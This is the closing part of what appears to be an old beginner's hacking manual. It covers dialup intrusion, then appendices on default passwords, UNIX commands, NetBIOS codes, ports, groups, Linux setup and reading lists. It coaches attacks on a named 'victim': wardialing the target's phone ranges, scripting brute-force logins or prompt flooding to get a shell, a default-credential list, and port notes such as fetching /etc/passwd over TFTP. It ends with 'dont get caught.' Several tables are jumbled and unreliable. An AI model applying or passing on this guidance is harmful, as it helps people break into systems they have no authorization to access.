Dialing a modem with your own is just like telnetting to a machine. You type characters
which are sent to the host, and it sends characters back to your screen. This means a few
things. Youre programs that use any TCP/IP stuph wont work - because youre not
communicating over a TCP/IP network. All you can do is send text over the wire. One of
the only reasons you ever might want to hack via dialup is because some companies might
have heavily guarded firewall system in place for the Internet, but less secure modems
(like if an employee hooks up a modem to their workstation without the sysadmin
knowing about it).
To dial out from your computer, youll either use a Windows or DOS program such as
Terminal, Hyperterminal, or Dial-Up Networking, or a Linux program such as netconf or

pppd. Hyperterminal comes with Win9X and NT, but I prefer the old Terminal program
that came with Windows 3.X. To talk to youre modem, youll use the AT commands.
Here are a few of those.
AT
To see if your modem is responding. If so, youll get an OK message back.
ATE0 To turn the local echo off. Some hosts will echo (send) characters you type back
to
your screen. If they do, turn the echo off.
ATE1 To turn the local echo off. If the host youre calling doesnt echo, youll want to
see what youre typing.
ATS0 To turn your modem speaker off.
ATS1 To turn your modem speaker on.
ATPPP To turn PPP mode on.
ATDT To dial a number using touch-tone (DTMF). To dial 555-6789 type: atdt 5556789
ATPT To dial a number using pulse dialing.
There are a lot of modem commands. Hyperterminal wont let you use them, since it does
all the dialing of numbers for you. Older DOS dialers/terminal emulators let you, though,
as does Terminal.
When you dial into a machine, youll most likely see either some old mainframe OS, or a
UNIX machine. NT does have a program called RAS, though, which stands for Remote
Access Service. You use Dial-Up Networking to connect to RAS servers, and once
authenticated, the computer (and sometimes network) you dialed into will show up on
youre network neighborhood. Windows 9X DUN must be updated before they can dial
into RAS servers, but NT Workstations DUN will work out of the box.
PSTN Protocols. When the PSTN was the primary means of internetworking, a few
protocols were developed to transfer data between remote hosts. Kermit, xmodem, and
ymodem are a few of these. Mainframes support these usually, so get a dialup terminal
emulator that supports these protocols to get or put data on/from these machines.
Terminal has a built-in file transfer function. Kermit for DOS supports most PSTN
protocols also.
How do you find dialup phone numbers? First find all phone numbers associated with that
organization. Look in the phone book. Do a whois and youll get a few phone numbers.
Then get yourself a wardialer. This is a program that scans PSTN exchanges. In laymens
terms, it will dial every phone number in a range you specify looking for modems. These
programs were very popular years ago, and most are for DOS. A few GUI wardialers
exist though. Two very good ones are PhoneTag and PhoneSweep. So say you look up
the phone number of victim.com in your phone directory and get 555-1234. You whois
them, and for an administrative contact you get 555-9876. Youd want your wardialer to
scan from 55512XX and 55598XX, meaning:
555-1200 to 555-1200 and
555-9800 to 555-9899

Youll probably find a few numbers that are carriers (modems). Dial into each, and see
what you find. If you get nothing when you connect, or garbage, try changing your start
bits, stop bits, and parity (in the settings of your dialer program) to get readable results.
For wardialers, PhoneTag is a good one. PhoneSweep is good too, and also has a built-in
brute force program, which is pretty handy, especially for dialing into UNIX servers. This
program might be your only way in to many dialup servers.
Then theres DUN. Microsoft Dial-Up Networking. When you dial your ISP, DUN takes
care of all the sending and receiving of characters over the phone line for you. To see
whats happening behind the scenes while you connect to your ISP, dial it with Terminal or
Hyperterminal. Youll actually get a login prompt that looks like one of these:
Login:
Username:
Userid:
Enter garbage, some username and password you know wont work. Youll get an access
denied message, or a regular UNIX bad login message. Then enter the
username/password you use to connect to your ISP. Youll usually get a string of garbage
characters, which is PPP or SLIP data (meaning youre connected to the Net). When you
use DUN, it types your username and password for you. Some systems require additional
info. One ISP I had prompted with just a > sign, at which point you type logon. You
then got a logon prompt, followed by the PPP data if you logged on successfully. DUN
will take care of all of this miscellaneous data transfer for you. Sometimes, though, the
host you dial into has a very obscure login process, involving multiple logons and
commands to get an Internet connection. DUN cant know all of this, so you use Dial-Up
Networking scripts. These are.scp files. DUN scipts tell DUN what characters to send,
and when. For example, a while back CompuServer didnt have their own DUN client
program, and logging into their system was to obscure for DUN to handle by itself, and
too confusing for most people to use. So they gave out an .scp file to use with MS DUN,
that typed in the appropriate characters at the right time. Whats the point of all this?
DUN scripting is very easy to learn. Do a search on your own box for *.scp, and youll
find a few that come with Windows. The syntax is pretty easy. Functions like Expect,
and Send. Something like: expect login: - send root means when I get the text
login: Ill send the text root . If you spend a few minutes looking at the .scp files that
come with Windows, youll figure out how to use it. And when you do, youll be better
armed to hack a dialup machine. Write a script that BFs your target. Or write one that
spits tons of data (lines and lines of characters) to a certain prompt to overload it and see
what happens - maybe youll get a shell.

Appendix B - Commonly used and default usernames/passwords, UNIX

username: common passwords
----------------------------------------root: root
sys: sys / system / bin

bin: sys / bin

mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo / tour / guest
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
qadmin: adm / admin
sys: sys system / bin
123: lotus / lotus123
anonuucp: anon / uucp
asg: device / devadmin
backup: save / tar
csr: support / castup
dbcat: database / catalog
default: user / guest
diag: diag / sysdiag(s)
field: fld / test / support
end: visitor / demo / tour
informix: database
ingres: database
lib: library / syslib
lp: print / lpadmin
lpr: (no password)
main: sysmaint / service
mail: mail / email / phones
manager: mgr / man
ncrm: ncr
net: netowrk
netinst: inst / install / net
netman: net / man / mgr
netmgr: mgr / man / net
network: net
nobody: anon
nuucp: anon
oasys: oa
odt: opendesktop
oper: operator / sysop
sysop: sysadm / sysop
ftp: ftp / anon / anonymous

telnet: telnet
visitor: anon / guest
www: webmaster / webadmin
Appendix C - UNIX commands
Here are some basic commands that work on most UNIX flavors
cd [dir]
change directory to [dir]. cd with no arguments will place you in your
home directory.
pwd
tells you what directory you're currently in.
ls
lists the files in your pwd
ls -a
lists all files in your pwd, even hidden files (files that begin with a period)
ls -l
lists the files in your pwd, and gives the permissions for them
cat [file]
displays the file you argue on the screen, equivalent to 'type' in DOS
vi
powerful text editor, for avanced users
emacs, and pico text editors, similar to MS-DOS Edit
man [command] gives you the manual (help pages) on a particular command - USE
THIS!!!
cp [src][dst] copy a file from src to dst
rm [file]
delete a file
mv [file] [newfile]
move or rename a file
mkdir
create a directory
chmod
change permissions of a file you own (use 'man' to learn more about this
command)
grep
search a file for a particular string
talk
chat with a user
mail
commandline email
pine and elm front-ends to mail
rlogin
learn about rhosts files - a great hacking technique
rsh
ditto
Also, if you are fermilliar with DOS redirects, appends, and pipes, they work similarly in
UNIX. Remember, when in doubt, RTFM!
Appendix D - NT Hex Codes
When you nbtstat an NT b0x, you'll be presented with a list of entires, and a hex code in
anglebrackets telling you what that entry is. Why do you need to know any besides <00>
and <20>? To get an idea of what role the computer plays in the domain. Here's what
they are.
Name
Number
Type
Usage
================================================================
========
<computername>
00
U
Workstation Service
<computername>
01
U
Messenger Service
<_MSBROWSE_> 01
G
Master Browser
<computername>
03
U
Messenger Service

<computername>
06
<computername>
1F
<computername>
20
<computername>
21
<computername>
22
<computername>
23
<computername>
24
<computername>
30
<computername>
31
<computername>
43
<computername>
44
<computername>
45
<computername>
46
<computername>
4C
<computername>
52
<computername>
87
<computername>
6A
<computername>
BE
<computername>
BF
<username>
03
<domain>
00
<domain>
1B
<domain>
1C
<domain>
1D
<domain>
1E
<INet~Services>
1C
<IS~Computer_name>
<computername>
[2B]
IRISMULTICAST
[2F]
IRISNAMESERVER [33]
Forte_$ND800ZA
[20]

U
U
U
U
U
U
U
U
U
U
U
U
U
U
U
U
U
U
U
U
G
U
G
U
G
G
00

U
U
G
G
U

RAS Server Service

NetDDE Service
File Server Service
RAS Client Service
Exchange Interchange
Exchange Store
Exchange Directory
Modem Sharing Server Service
Modem Sharing Client Service
SMS Client Remote Control
SMS Admin Remote Control Tool
SMS Client Remote Chat
SMS Client Remote Transfer
DEC Pathworks TCPIP Service
DEC Pathworks TCPIP Service
Exchange MTA
Exchange IMC
Network Monitor Agent
Network Monitor Apps
Messenger Service
Domain Name
Domain Master Browser
Domain Controllers
Master Browser
Browser Service Elections
Internet Information Server
Internet Information Server
Lotus Notes Server
Lotus Notes
Lotus Notes
DCA Irmalan Gateway Service

Appendix E - Commonly known TCP ports

If you're unsure about any of these, look at the protocol section of 'TCP/IP and the
Client/Server Model' above. Otherwise, research them on the Net.
Port Description
1
TCP Mux
7
Echo
troubleshooting
9
Discard/null
11
Systsat
13 Daytime
15 Netstat
19 Chargen

How to Hack it (Explanation)

You figure this one out
All characters are echoed back to you, used for network
The name says it all... how quick can you figure this port out?
Use this port to get info on users of that system
Time and date, used to synchronize computers in a network
Info on network settings for this computer - go here!
Character Generator - used to spot network problems

21 FTP
22 SSH
23 Telnet
25 SMTP
39 Rlp
43 Whois
53 DNS
69 TFTP
70 Gopher
79 Finger
80 HTTP (www)
110
POP3
111
SunRPC
118
SQLSrv
database
119
NNTP
139
Nbsession
443
SSL
512
Biff
513
Rlogin/who
520
Route
524
NCP
box

File Transfer Protocol

Secure Shell - encrypted telnet
Telnet
Simple Mail Transfer Protocol
Resource location
This machine has a whois daemon - use it
Domain Name Service
Trivial FTP - oftentimes vulnerable (get /etc/passwd)
Text-only web surfing and indexing
Info on users (and who's logged on). Hack this!
A web server
Post Office Protocol - used for email
RPC - used in conjunction with NIS, and possible vulnerable
SQL (Sequel) Server - this machine proably housed a huge
Network News Transfer Protocol - Usenet server
Net BIOS Session Service - Windows Networking
Secure HTTP - (Secure Session Link). Browse with 'https://'
Mail notification
Remote login / remote who
Routing information protocol
Netware Core Protocol (over IP) - sure sign of a Novell Netware

Appenxix F - NT and UNIX Groups

Groups (in NT and UNIX) are an integral part to how permissions work. Most system
admins assign permissions to individual user accounts. Instead they put certain users into
certain groups, and assign permissions to those groups. Here is some info on groups for
both OSs.
NT
Group
Domain Admins
Account Operators
Domain Guests
Domain Users
world access)
UNIX
Group
Root
Bin
Daemon
Sys
Adm
Tty
Disk

GID
0
1
3
4
5
6

Privelages
High (Administrator equivalent)
High
Low
Low (everyone is part of this group - gives everyone or the

Members
root(UID 0)
root, bin(UID 1), daemon(UID 2)
2
root, bin, daemon
root, bin, adm(UID 3)
root, adm, daemon
root

Lp
Mem
Kmem
Wheel
Mail
News
Uucp
Man
Games
Gopher
Dib
ftp
nobody
users
floppy

7
8
9
10
12
13
14
15
20

daemon, lp(UID 4)
root
mail(UID 8)
news(UID 9)
uucp(UID 10)
30

40
50
99
100
19

Deamons, such as httpd and ftpd also have UIDs, which are set by the sysadmin. Having
daemons with low UIDs is an insecurity - if a remote attacker can exploit httpd with a
low UID, he can access resources with that UID equivalent. So if you buffer overflow
ftpd (running UID 0) from outside and get a shell, that shell will be a rootshell - being its
UID is 0 (root).
Appendix G - Redhat Linux Installation
Many kool hacker things for UNIX require that you are root. So you need root on a
system, but cant hack root cuz you cant use Nmap, SATAN, or even showmount. Also
theres no better way to learn how to hack UNIX machines than practicing on your own.
You need to install Linux on a partition of your hard drive. Some newbies have trouble
with this - its not exactly like a Windows installation.
Redhat is probably the easiest Linux to get up and running, rivaled by Caldera and SuSE.
Version 6.X is out, but 5.2 will cost you only $30. Or have a friend burn you a copy of
the CD-ROMs and boot floppy. Once you have this, youre ready to begin.
First write down everything about your PC you can, especially monitor and display
adapter info.
If your machine cant natively boot off of your CD-ROM drive, Redhat comes with a boot
floppy. Slap it in, and boot up. When prompted, hit enter for normal (versus expert)
mode. Drivers for your CD-ROM, keyboard, and monitor will be loaded, and installation
will be switched to from your CD-ROM (make sure the CD is in). Youll then be asked
where you want to install from (NFS, Image, etc). Choose CD-ROM obviously.
When you partition your hard drive, use Disk Druid. Youll need a separate partition for
Linux swap space - make it 7 mb or so. HDA1 is hard drive 1 (a), partition 1, whereas
HDB3 is hard drive 2 (b) partition 3. Disk Druid uses this naming scheme. This is also
how partitions will be referred to later during the installation, and in your /etc file (HDA1
is represented by the file /etc/hda1).

Soon youll be prompted with a class of install: Workstation, Server, and Custom. If you
have the hard drive space (a little over a gig) choose server, otherwise choose workstation
(500 MB). If you have any less than 500 megs, you wont be able to install enough to
make a k-leet Linux box. Anyways, Custom allows you to pick individual packages - if
you do this, make sure you include C development libraries (to compile exploits), editors,
and X (if you want a GUI).
X ( X Windows, the GUI for Linux) is probably the hardest part to install. If your display
card isnt listed in the list presented to you, youll have to find out the following settings
for your machine: vertical refresh rate, horizontal sync rate, megs of vid ram, and your
clockchip setting. Get these from documentation that came with your hardware, or from
technical support. If you just cant figure it out, try different settings until it works.
Xconfigurator is the utility to change X settings after installation.
LILO is the program you use to change boot parameters. If you have multiple OSs
(Win98, NT, and Linux), youll need to configurate LILO to boot to all these OSs. The
installation will prompt you for the necessary info, otherwise use linuxconfig to do it
manually.
Use the linuxconfig utility to configure your box after installation. Use netconf to config
networking (including dial-up networking) stuph for your box. The redhat website
(www.redhat.com) site also is a good source for tech support. Www.freshmeat.com has a
good dialer program to get you connected to the net, and www.slashdot.com is always a
good Linux reference.
Appendix H - Further Reading
This manual is the most in-depth yet all-encompasing hacking text for newbies I've seen
yet. Im not bragging - I too have lot to learn. But Ive put a lot of time into this text
over the various releases, and I think it covers a lot. The Net does hold a lot more,
though. Some you'll find are very basic and a bit of a waste of time. Others are very old,
and only cover stuph like dial-up hacking. Lame. There are a lot of good texts out there
that cover very specific areas of hacking (details that couldn't be covered here without
writing an encyclopedia). I encourage you to download and read as many of these as you
can get your hands on. Target a SCO Unixware box? Get a text on SCO vulnerabilities.
Find a new, more complex hacking tool such as NMap or NetCat? Grab a tutorial on it theres no need for me to reinvent the wheel. Also, a few books have been published on
the subject. Here's a quick guide to texts and books worth your time.
Texts
The Happy Hacker's Guides to Mostly Harmless Hacking are worth reading, especially for
newbies. Get them at www.happyhacker.org.
The Hacker's Desk Reference is a in-depth look at Windows Networking and NetBEUI,
along with other things. This is a very informative text, but might confuse the newbies.
By Rhino9. Available at TCU.
The NT WarDoc is a new text also by Rhino9. It covers NT break-in techniques in more
detail. Also available at TCU.
Securing Your Site by Breaking Into It is a good all-around UNIX hacking text. Available
at TCU.

The Hacker's Kit is handy. Its a bit old, but if you can wade through the occasional lame
content, you'll find usefull UNIX hacking tricks. This text is also filled with C code - tools
and exploits of all kinds. Available at TCU.
Books
If you've ever heard of the Rainbow Books, they're worth a look at. They're specific
books on specific technolgies and entities. Old, but usefull.
For general Network books, take a look at these: Networking Essentials by Microsoft
Press. This is a beginner's book to how networks work.
Cisco Routers and TCP/IP - complex, but great for learning how the Internet really
works.
The Big UNIX Book is just that - full of UNIX info, including shell scripting,
configuration, etc. Secrets of Redhat Linux is also good. Microsoft TCP/IP and NT
Technical Support are good books to learn the innerworkings of NT.
And then the actual hacker books.
Secrets of a Super Hacker by The Knightmare was the first of these. It's pretty vague, and
doesn't cover Internet hacking (due to its age), but is worth at least a check-out from your
library.
The Happy Hacker is a great book for complete newbies. But if you consider yourself a
novice hacker, most of the stuph in that book will bore you.
Maximum Security is a huge book with good info and a pretty big list of system
vulnerabilities. It explains how to secure a network by explaining to how hack into one
(sort of). It also has a decent amount of TCP/IP info - stuph you'll need to know. It
covers NT and UNIX well too.
Maximum Linux Security is pretty good too. It covers Linux security as well as other
miscellaneous Linux issues. One particularly nice thing about this book is it explains how
to setup a firewall with Linux.
And Hacking Exposed - the latest one. This one is, in my opinion, the best of the four.
Not for amatures, but definitely a good book. You'll learn all sorts of leet techniques to
use, along with what programs to use and how to use them. Get this book.
RFCs are good references to technical material as well. Www.hackersclub.com gets lots
of submissions on specific vulnerabilities - always a good place to look. The further
reading section is titled how to become elite for a reason. In order to become 31337,
youll have to do a lot of reading. Not just how to hack stuph either. Youll need to
learn all kinds of systems, protocols, and technologies. Another great way to learn about a
certain system is to install it on your own machine. Get NT Server and install IIS. Most
Linux distributions come with Apache Web Server - install it and see how it works for
yourself. Youll be much better armed in hacking it.
Mostly, just have fun with this stuff. Enjoy learning what you must in order to break in.
The process, not just the end result. So, on that note, have fun, learn, and dont get
caught.
Happy Hacking!